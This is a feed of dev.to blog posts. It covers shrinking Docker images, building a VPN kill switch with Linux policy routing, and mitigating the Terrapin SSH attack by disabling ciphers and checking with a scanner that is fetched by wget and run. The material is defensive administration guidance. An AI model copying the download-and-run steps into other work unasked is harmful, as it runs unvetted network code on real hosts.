🌊 &lt;span class="nb"&gt;cd &lt;/span&gt;build-musl
🌊 &lt;span class="nb"&gt;env &lt;/span&gt;&lt;span class="nv"&gt;CC&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;musl-gcc &lt;span class="nv"&gt;LDFLAGS&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'-static'&lt;/span&gt; cmake &lt;span class="nt"&gt;-DCMAKE_BUILD_TYPE&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Release ..
🌊 make
&lt;span class="o"&gt;[&lt;/span&gt; 50%] Building C object CMakeFiles/app.dir/app.c.o
&lt;span class="o"&gt;[&lt;/span&gt;100%] Linking C executable app
&lt;span class="o"&gt;[&lt;/span&gt;100%] Built target app
🌊 ldd ./app
        not a dynamic executable
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
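The resulting static binary can then be packaged exactly like the Rust and Go binaries above. A minimal sketch; the path assumes the build-musl directory from the previous snippet:

```shell
FROM scratch
COPY build-musl/app /bin/app
CMD ["/bin/app"]
```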



&lt;h1&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Conclusion
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftxisbn4lxjxtftg0r1t3.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftxisbn4lxjxtftg0r1t3.jpg" alt="Photo by Walter Walraven on Unsplash." width="640" height="421"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;There are multiple approaches that help reduce Docker image size:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;including only the required dependencies with &lt;code&gt;patchelf&lt;/code&gt;,&lt;/li&gt;
&lt;li&gt;including only the required files with &lt;code&gt;strace&lt;/code&gt;,&lt;/li&gt;
&lt;li&gt;compiling your own program into a static binary that includes all the dependencies.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;On average you can reduce the image size by approximately 50% (at least in our experiments). The smaller size improves Docker performance on resource-constrained devices such as the Raspberry Pi Zero. However, the major benefit on any platform is the much smaller attack surface: your image no longer contains tools like &lt;code&gt;wget&lt;/code&gt;, &lt;code&gt;curl&lt;/code&gt; and shell interpreters.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;We at Staex help our clients make IoT devices first-class citizens in their private networks, protect from common attacks, reduce mobile data usage, and enable audacious use cases that were not possible before. To learn more about our product please visit this &lt;a href="https://staex.io/"&gt;page&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>linux</category>
      <category>devops</category>
      <category>security</category>
      <category>docker</category>
    </item>
    <item>
      <title>VPN kill switch: how to do it on Linux</title>
      <dc:creator>Ivan</dc:creator>
      <pubDate>Tue, 02 Jan 2024 12:00:00 +0000</pubDate>
      <link>https://dev.to/staex/vpn-kill-switch-how-to-do-it-on-linux-3ne3</link>
      <guid>https://dev.to/staex/vpn-kill-switch-how-to-do-it-on-linux-3ne3</guid>
      <description>&lt;p&gt;&lt;a href="https://en.wikipedia.org/wiki/Kill_switch"&gt;Kill switch&lt;/a&gt; is a mechanism that prohibits any outgoing traffic unless a VPN is active. In this article we discuss how to implement such a mechanism using Linux &lt;a href="https://en.wikipedia.org/wiki/Policy-based_routing"&gt;policy-based routing&lt;/a&gt; for a wide range of VPNs.&lt;/p&gt;

&lt;h1&gt;
  
  
  Table of contents
&lt;/h1&gt;

&lt;ul&gt;
&lt;li&gt;
Linux IP packet routing tour.

&lt;ul&gt;
&lt;li&gt;
CIDR notation, gateways and broadcast addresses.&lt;/li&gt;
&lt;li&gt;
How to read the routing table.&lt;/li&gt;
&lt;li&gt;
Is there only one routing table?&lt;/li&gt;
&lt;li&gt;
Policy-based routing.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;
&lt;li&gt;
VPN kill switch with policy-based routing.

&lt;ul&gt;
&lt;li&gt;
Custom routing table.&lt;/li&gt;
&lt;li&gt;
Custom routing rules.&lt;/li&gt;
&lt;li&gt;Any alternatives?&lt;/li&gt;
&lt;li&gt;
Multiple VPNs.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;
&lt;li&gt;
Conclusion.&lt;/li&gt;
&lt;/ul&gt;

&lt;h1&gt;
  
  
  Linux IP packet routing tour&lt;a&gt;&lt;/a&gt;
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbcwf5rplfbp0ygnldhl3.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbcwf5rplfbp0ygnldhl3.jpg" alt="Photo by Robin Pierre on Unsplash." width="640" height="427"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Before diving into how to implement a kill switch we need to get familiar with how Linux IP packet routing works in general. The best way to do that is to run &lt;code&gt;ip route&lt;/code&gt; command that shows a routing table. On my computer this command outputs the following.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 ip route
default via 10.65.0.1 dev wlan0 proto dhcp src 10.65.0.11 metric 305
10.33.0.0/16 dev vpn1 scope &lt;span class="nb"&gt;link
&lt;/span&gt;10.65.0.0/20 dev wlan0 proto dhcp scope &lt;span class="nb"&gt;link &lt;/span&gt;metric 305
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  CIDR notation, gateways and broadcast addresses&lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;Each row in the table is a rule that matches a particular packet destination in &lt;a href="https://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing#CIDR_notation"&gt;CIDR notation&lt;/a&gt;. For example, &lt;em&gt;10.33.0.0/16&lt;/em&gt; matches any packet with a destination &lt;em&gt;10.33.X.X&lt;/em&gt; where &lt;em&gt;X&lt;/em&gt; is an arbitrary number from 0 to 255. Usually the first address &lt;em&gt;10.33.0.1&lt;/em&gt; is the gateway — the default packet destination if no rules match the current packet destination — and the last address &lt;em&gt;10.33.255.255&lt;/em&gt; is the broadcast address — if you send a packet to this address, all nodes in the network will receive it. The reality is more complicated though: you can use any address as the gateway and set any address as the broadcast address. Also, broadcast packets are usually only sent to the nodes connected to the same network switch, and they are usually blocked by the network router to prevent accidental flooding.&lt;/p&gt;
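You can double-check these boundary addresses with Python's standard ipaddress module, invoked here from the shell (a quick sanity check, not part of the routing setup):

```shell
# print the network address, broadcast address and address count for 10.33.0.0/16
python3 -c 'import ipaddress
n = ipaddress.ip_network("10.33.0.0/16")
print(n.network_address, n.broadcast_address, n.num_addresses)'
# prints: 10.33.0.0 10.33.255.255 65536
```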

&lt;h2&gt;
  
  
  How to read the routing table&lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;Now we can go back to the table to study the rules. In the output, &lt;em&gt;default&lt;/em&gt; is another way of spelling &lt;em&gt;0.0.0.0/0&lt;/em&gt;; this rule matches any packet destination.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The first rule says «forward the packet to the gateway with address &lt;em&gt;10.65.0.1&lt;/em&gt; if no other rules match».&lt;/li&gt;
&lt;li&gt;The second rule says «forward the packet to network device vpn1 if the destination matches &lt;em&gt;10.33.0.0/16&lt;/em&gt;». In this case the device driver or a program that is attached to this device will handle the packet.&lt;/li&gt;
&lt;li&gt;The third rule says «forward the packet to network device &lt;em&gt;wlan0&lt;/em&gt; if the destination matches &lt;em&gt;10.65.0.0/20&lt;/em&gt;». There is no gateway in this rule because the packet's destination is in the same network as the gateway, so Linux sends the packet directly to the destination.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Is there only one routing table?&lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;As you may have guessed, there are multiple routing tables in the system: default, local and main. Each table has an id and a name; the mapping between them is stored in the &lt;code&gt;/etc/iproute2/rt_tables&lt;/code&gt; file. Counterintuitively, the table used by default is main, not default. To see the contents of the other tables use the following commands.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 ip route show table main
...
🌊 ip route show table &lt;span class="nb"&gt;local&lt;/span&gt;
...
🌊 ip route show table default
...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;On my computer the default table does not exist. The local table lists the local and broadcast addresses associated with network devices.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 ip route show table &lt;span class="nb"&gt;local
local &lt;/span&gt;10.33.0.41 dev vpn1 proto kernel scope host src 10.33.0.41
&lt;span class="nb"&gt;local &lt;/span&gt;10.65.0.11 dev wlan0 proto kernel scope host src 10.65.0.11
broadcast 10.65.15.255 dev wlan0 proto kernel scope &lt;span class="nb"&gt;link &lt;/span&gt;src 10.65.0.11
&lt;span class="nb"&gt;local &lt;/span&gt;127.0.0.0/8 dev lo proto kernel scope host src 127.0.0.1
&lt;span class="nb"&gt;local &lt;/span&gt;127.0.0.1 dev lo proto kernel scope host src 127.0.0.1
broadcast 127.255.255.255 dev lo proto kernel scope &lt;span class="nb"&gt;link &lt;/span&gt;src 127.0.0.1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
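For reference, the default id-to-name mapping in /etc/iproute2/rt_tables usually looks like this (exact contents may vary between distributions):

```shell
🌊 cat /etc/iproute2/rt_tables
255     local
254     main
253     default
0       unspec
```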



&lt;h2&gt;
  
  
  Policy-based routing&lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;Linux has another set of rules that define how the routing table is selected. These rules have priorities: if a packet matches multiple rules, the rule with the lowest priority number wins. To see all the rules use the &lt;code&gt;ip rule&lt;/code&gt; command.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 ip rule
0:      from all lookup &lt;span class="nb"&gt;local
&lt;/span&gt;32766:  from all lookup main
32767:  from all lookup default
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;On my computer each rule matches any packet (the &lt;em&gt;from all&lt;/em&gt; clause in the output), and the &lt;em&gt;local&lt;/em&gt; table is consulted before &lt;em&gt;main&lt;/em&gt; because of its lower priority number. This is what we will leverage to create a VPN kill switch.&lt;/p&gt;

&lt;h1&gt;
  
  
  VPN kill switch with policy-based routing&lt;a&gt;&lt;/a&gt;
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvifyoh5pt19ps6kjj7m8.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvifyoh5pt19ps6kjj7m8.jpg" alt="Photo by kimi lee on Unsplash" width="640" height="960"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A VPN kill switch requires routing all outgoing traffic through the VPN except for the local traffic and the VPN's own internal traffic. This means that if the VPN uses port 1234, then the traffic from this port should go through the default gateway or directly to a node in the local network. To implement that, we will create a separate table and a rule that uses this table for all non-VPN and non-local packets.&lt;/p&gt;

&lt;h2&gt;
  
  
  Custom routing table&lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;First, edit the &lt;code&gt;/etc/iproute2/rt_tables&lt;/code&gt; file and add the following line that defines our new table.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;83 vpn1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now create the routes in the new table. The table itself is created automatically.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# remove existing rules if any&lt;/span&gt;
🌊 ip route flush table vpn1
&lt;span class="c"&gt;# add default route via gateway node from VPN network&lt;/span&gt;
🌊 ip route add default dev vpn1 via 10.83.0.1 table vpn1 metric 100
&lt;span class="c"&gt;# add blackhole route (this is the actual kill switch)&lt;/span&gt;
🌊 ip route add blackhole default table vpn1 metric 200
&lt;span class="c"&gt;# check that the rule has been added&lt;/span&gt;
🌊 ip route show table vpn1
default via 10.83.0.1 dev vpn1 metric 100
blackhole default metric 200
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To summarize: we added a new routing table called &lt;em&gt;vpn1&lt;/em&gt;, a default route via the gateway node from the VPN network, and a so-called blackhole route. The default route is preferred over the blackhole route because of its lower metric; the blackhole route is used only when the default route is not present in the table. The &lt;em&gt;vpn1&lt;/em&gt; device is automatically deleted whenever the VPN is stopped, and the corresponding routes are deleted as well; however, the blackhole route stays intact, which is exactly what makes the kill switch work: with the VPN down, all matching traffic is dropped.&lt;/p&gt;

&lt;h2&gt;
  
  
  Custom routing rules&lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;Now we will link &lt;em&gt;vpn1&lt;/em&gt; to the &lt;em&gt;main&lt;/em&gt; routing table.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# route all packets except the ones from source port 1234 using the rules from table vpn1&lt;/span&gt;
🌊 ip rule add not sport 1234 table vpn1
&lt;span class="c"&gt;# prefer specific rules in table "main" over the rules in other tables&lt;/span&gt;
🌊 ip rule add table main suppress_prefixlength 0
&lt;span class="c"&gt;# check the rules&lt;/span&gt;
🌊 ip rule
0:      from all lookup &lt;span class="nb"&gt;local
&lt;/span&gt;32764:  from all lookup main suppress_prefixlength 0
32765:  not from all sport 1234 lookup vpn1
32766:  from all lookup main
32767:  from all lookup default
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The first rule is self-explanatory; you can check out all possible alternatives to &lt;em&gt;not sport&lt;/em&gt; in the &lt;a href="https://man7.org/linux/man-pages/man8/ip-rule.8.html"&gt;documentation&lt;/a&gt;. According to the documentation, the &lt;em&gt;suppress_prefixlength N&lt;/em&gt; option means «reject routing decisions that have a prefix length of &lt;em&gt;N&lt;/em&gt; or less». A prefix length of zero means the default route, hence this rule means «reject routing decisions that match the default route in table &lt;em&gt;main&lt;/em&gt;». So, &lt;em&gt;suppress_prefixlength 0&lt;/em&gt; is a fancy way of saying «ignore the default route from the main routing table». Since the next table in the list is &lt;em&gt;vpn1&lt;/em&gt;, all the traffic except for local networks will go through the &lt;em&gt;vpn1&lt;/em&gt; network interface.&lt;/p&gt;

&lt;h2&gt;
  
  
  Any alternatives?&lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;We tested policy-based VPN kill switch with Wireguard (do not forget to specify the port in the configuration) and Staex. Both VPNs use only one port for their internal traffic. It should be possible to match the traffic of a centralized VPN by source/destination in CIDR notation (&lt;em&gt;from&lt;/em&gt; and &lt;em&gt;to&lt;/em&gt; options of &lt;a href="https://man7.org/linux/man-pages/man8/ip-rule.8.html"&gt;&lt;code&gt;ip rule&lt;/code&gt;&lt;/a&gt; command). In general the exact packets can be marked using &lt;em&gt;iptables&lt;/em&gt; and then matched by the same mark in the routing rules (see &lt;a href="https://man7.org/linux/man-pages/man8/iptables-extensions.8.html"&gt;mark&lt;/a&gt; &lt;em&gt;iptables&lt;/em&gt; module). This &lt;a href="https://www.wireguard.com/netns/"&gt;article&lt;/a&gt; discusses various approaches within the context of Wireguard.&lt;/p&gt;
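For the firewall-mark approach, a sketch could look like the following (the port 51820 is WireGuard's default and is an assumption here; adjust it and the mark value to your setup):

```shell
# mark the VPN's own outgoing UDP traffic so that it can bypass the kill switch
iptables -t mangle -A OUTPUT -p udp --sport 51820 -j MARK --set-mark 0x51
# route everything that does not carry the mark through table vpn1
ip rule add not fwmark 0x51 table vpn1
```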

&lt;h2&gt;
  
  
  Multiple VPNs&lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;The nature of a kill switch does not play well with multiple VPNs. Probably the only way to exclude multiple ports from the default route is to use firewall marks. We have not evaluated this approach yet.&lt;/p&gt;

&lt;h1&gt;
  
  
  Conclusion&lt;a&gt;&lt;/a&gt;
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9p47f07z7ne76gutufmo.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9p47f07z7ne76gutufmo.jpg" alt="Photo by Denys Nevozhai on Unsplash." width="640" height="480"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We conceived the kill switch as a simple VPN feature; however, we underestimated the complexity of Linux networking. Linux has multiple layers of IP packet routing rules, a built-in firewall and network namespaces. VPNs do not make the task simpler either: they might use several ports for internal communication, or you might want to run multiple VPNs on a single node.&lt;/p&gt;

&lt;p&gt;The kill switch will be available in the upcoming Staex release. &lt;a href="https://staex.io/blog/subscribe"&gt;Subscribe to our newsletter&lt;/a&gt; to be notified about new releases.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;We at Staex help our clients make IoT devices first-class citizens in their private networks, protect from common attacks, reduce mobile data usage, and enable audacious use cases that were not possible before. To learn more about our product please visit &lt;a href="https://staex.io/product?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=2024-01-03"&gt;this page&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>linux</category>
      <category>security</category>
      <category>devops</category>
    </item>
    <item>
      <title>Terrapin attack on SSH: what do you need to know</title>
      <dc:creator>Ivan</dc:creator>
      <pubDate>Wed, 27 Dec 2023 17:00:00 +0000</pubDate>
      <link>https://dev.to/staex/terrapin-attack-on-ssh-what-do-you-need-to-know-2ffd</link>
      <guid>https://dev.to/staex/terrapin-attack-on-ssh-what-do-you-need-to-know-2ffd</guid>
      <description>&lt;p&gt;&lt;a href="https://staex.io/blog/terrapin-attack-on-ssh-what-do-you-need-to-know"&gt;Terrapin&lt;/a&gt; is a recent prefix truncation attack on SSH that exploits deficiencies in the protocol specification, namely not resetting sequence number and not authenticating certain parts of handshake transcript. The attack requires man-in-the-middle, i.e. a rogue network node that intercepts the traffic. SSH protocol is used to remotely manage servers and IoT devices and is widely spread. In this article we explain how to secure your servers and devices from this attack.&lt;/p&gt;

&lt;h1&gt;
  
  
  Table of contents
&lt;/h1&gt;

&lt;ul&gt;
&lt;li&gt;How to protect your SSH servers&lt;/li&gt;
&lt;li&gt;Mitigation for OpenSSH&lt;/li&gt;
&lt;li&gt;Mitigation for Dropbear on Debian&lt;/li&gt;
&lt;li&gt;Mitigation for Dropbear on OpenWRT&lt;/li&gt;
&lt;li&gt;Defense in depth&lt;/li&gt;
&lt;/ul&gt;

&lt;h1&gt;
  
  
  How to protect your SSH servers &lt;a&gt;&lt;/a&gt;
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmud5oty9bsmnc1hyrt5x.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmud5oty9bsmnc1hyrt5x.jpg" alt="Photo by Ray Hennessy on Unsplash." width="640" height="426"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;According to the &lt;a href="https://terrapin-attack.com/TerrapinAttack.pdf"&gt;paper&lt;/a&gt; the attack is possible only if you use vulnerable ciphers and encryption modes: ChaCha20-Poly1305, CTR-EtM, CBC-EtM. Note that the ciphers and the encryption modes themselves are not vulnerable, but their input (sequence number) can be manipulated by the attacker.&lt;/p&gt;

&lt;p&gt;To mitigate the attack, either update OpenSSH and Dropbear to their latest versions (&lt;a href="https://www.openssh.com/txt/release-9.6"&gt;OpenSSH 9.6&lt;/a&gt; and Dropbear 2022.83) or disable the affected ciphers and encryption modes. We will show how to do the latter.&lt;/p&gt;
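&lt;p&gt;For OpenSSH the same effect can also be expressed declaratively: recent versions accept a leading «-» in algorithm lists to remove entries from the default set. A sketch (verify the resulting lists with &lt;code&gt;sshd -T&lt;/code&gt; before restarting the daemon):&lt;/p&gt;

```
# /etc/ssh/sshd_config
# remove the vulnerable cipher and the EtM MAC variants from the defaults
Ciphers -chacha20-poly1305@openssh.com
MACs -*-etm@openssh.com
```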

&lt;h2&gt;
  
  
  Mitigation for OpenSSH &lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;We will show how to disable the affected ciphers using Debian as an example. We will use Docker to make the steps reproducible. Then we will verify the configuration with the &lt;a href="https://github.com/RUB-NDS/Terrapin-Scanner/releases/latest"&gt;vulnerability scanner&lt;/a&gt; provided by the authors of the paper.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# docker run -it --rm debian:latest&lt;/span&gt;
&lt;span class="c"&gt;# then run the following commands&lt;/span&gt;
apt-get update
apt-get &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; wget ssh
&lt;span class="nb"&gt;mkdir&lt;/span&gt; /run/sshd

&lt;span class="c"&gt;# check if ssh is vulnerable&lt;/span&gt;
/usr/sbin/sshd
wget https://github.com/RUB-NDS/Terrapin-Scanner/releases/download/v1.1.0/Terrapin_Scanner_Linux_amd64
&lt;span class="nb"&gt;chmod&lt;/span&gt; +x Terrapin_Scanner_Linux_amd64
./Terrapin_Scanner_Linux_amd64 &lt;span class="nt"&gt;-connect&lt;/span&gt; 127.0.0.1:22
pkill sshd

&lt;span class="c"&gt;# print effective ssh configuration and filter out affected ciphers&lt;/span&gt;
&lt;span class="c"&gt;# '*-cbc' ciphers should be disabled by default&lt;/span&gt;
sshd &lt;span class="nt"&gt;-T&lt;/span&gt; | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-nr&lt;/span&gt; &lt;span class="s1"&gt;'s/(chacha20-poly1305@openssh\.com,|,chacha20-poly1305@openssh\.com)//gip'&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; /etc/ssh/sshd_config

&lt;span class="c"&gt;# re-check ssh&lt;/span&gt;
/usr/sbin/sshd
./Terrapin_Scanner_Linux_amd64 &lt;span class="nt"&gt;-connect&lt;/span&gt; 127.0.0.1:22
pkill sshd
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Mitigation for Dropbear on Debian &lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;To disable the affected ciphers in Dropbear we need to recompile it. Here we show the steps, again using a Docker container with the latest Debian and the Terrapin scanner.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# docker run -it --rm debian:latest&lt;/span&gt;
&lt;span class="c"&gt;# then run the following commands&lt;/span&gt;
apt-get update
apt-get &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; git wget build-essential zlib1g-dev
git clone https://github.com/mkj/dropbear
&lt;span class="nb"&gt;cd &lt;/span&gt;dropbear
&lt;span class="c"&gt;# here we disable ChaCha20Poly1305 and enable GCM instead&lt;/span&gt;
&lt;span class="c"&gt;# CBC is disabled by default&lt;/span&gt;
&lt;span class="nb"&gt;env &lt;/span&gt;&lt;span class="nv"&gt;CFLAGS&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'-DDROPBEAR_CHACHA20POLY1305=0 -DDROPBEAR_ENABLE_GCM_MODE=1'&lt;/span&gt; ./configure
make
make &lt;span class="nb"&gt;install&lt;/span&gt;

&lt;span class="c"&gt;# check if dropbear is vulnerable&lt;/span&gt;
dropbear &lt;span class="nt"&gt;-R&lt;/span&gt;
wget https://github.com/RUB-NDS/Terrapin-Scanner/releases/download/v1.1.0/Terrapin_Scanner_Linux_amd64
&lt;span class="nb"&gt;chmod&lt;/span&gt; +x Terrapin_Scanner_Linux_amd64
./Terrapin_Scanner_Linux_amd64 &lt;span class="nt"&gt;-connect&lt;/span&gt; 127.0.0.1:22
pkill dropbear
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Mitigation for Dropbear on OpenWRT &lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;For this Linux distribution you need a cross compiler to recompile Dropbear. The easiest way to get one is to use the &lt;a href="https://github.com/openwrt/docker"&gt;official Docker image&lt;/a&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# docker run -it --rm -v $PWD/bin/:/builder/bin openwrt/sdk:latest&lt;/span&gt;
&lt;span class="c"&gt;# Substitute 'latest' with your router's architecture.&lt;/span&gt;
&lt;span class="c"&gt;# All tags are listed on DockerHub: https://hub.docker.com/r/openwrt/sdk/tags&lt;/span&gt;
&lt;span class="c"&gt;# Then run the following commands.&lt;/span&gt;
./scripts/feeds update &lt;span class="nt"&gt;-a&lt;/span&gt;
make defconfig
&lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="s1"&gt;'s/.*DROPBEAR_CHACHA20POLY1305.*/# CONFIG_DROPBEAR_CHACHA20POLY1305 is not set/'&lt;/span&gt; .config
./scripts/feeds &lt;span class="nb"&gt;install &lt;/span&gt;dropbear
make package/dropbear/compile
make package/index
&lt;span class="c"&gt;# the IPK package is in 'bin' directory&lt;/span&gt;
&lt;span class="c"&gt;# now we will check that dropbear is not vulnerable&lt;/span&gt;
&lt;span class="c"&gt;# (you don't need to repeat this convoluted command)&lt;/span&gt;
&lt;span class="nb"&gt;env &lt;/span&gt;&lt;span class="nv"&gt;LD_LIBRARY_PATH&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;./staging_dir/toolchain-x86_64_gcc-12.3.0_musl/lib ./build_dir/target-x86_64_musl/toolchain/.pkgdir/libc/lib/ld-musl-x86_64.so.1 ./staging_dir/target-x86_64_musl/root-x86/usr/sbin/dropbear &lt;span class="nt"&gt;-R&lt;/span&gt;
wget https://github.com/RUB-NDS/Terrapin-Scanner/releases/download/v1.1.0/Terrapin_Scanner_Linux_amd64
&lt;span class="nb"&gt;chmod&lt;/span&gt; +x Terrapin_Scanner_Linux_amd64
./Terrapin_Scanner_Linux_amd64 &lt;span class="nt"&gt;-connect&lt;/span&gt; 127.0.0.1:22
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Upon exit the package will appear in the &lt;code&gt;bin&lt;/code&gt; directory. Copy it to your router and update Dropbear.&lt;/p&gt;

&lt;h1&gt;
  
  
  Defense in depth &lt;a&gt;&lt;/a&gt;
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9k2eamluyhucf4etvpfn.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9k2eamluyhucf4etvpfn.jpg" alt="Photo by Julia Solonina on Unsplash." width="640" height="427"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Disabling perfectly fine ciphers might be overkill. The Terrapin attack does not break SSH session integrity; it only allows an attacker to disable the keystroke timing obfuscation features of OpenSSH. Disabling ChaCha20-Poly1305 in Dropbear (which is often used on embedded devices) would increase CPU usage: most embedded CPUs have no hardware acceleration for the AES ciphers that would be used instead.&lt;/p&gt;
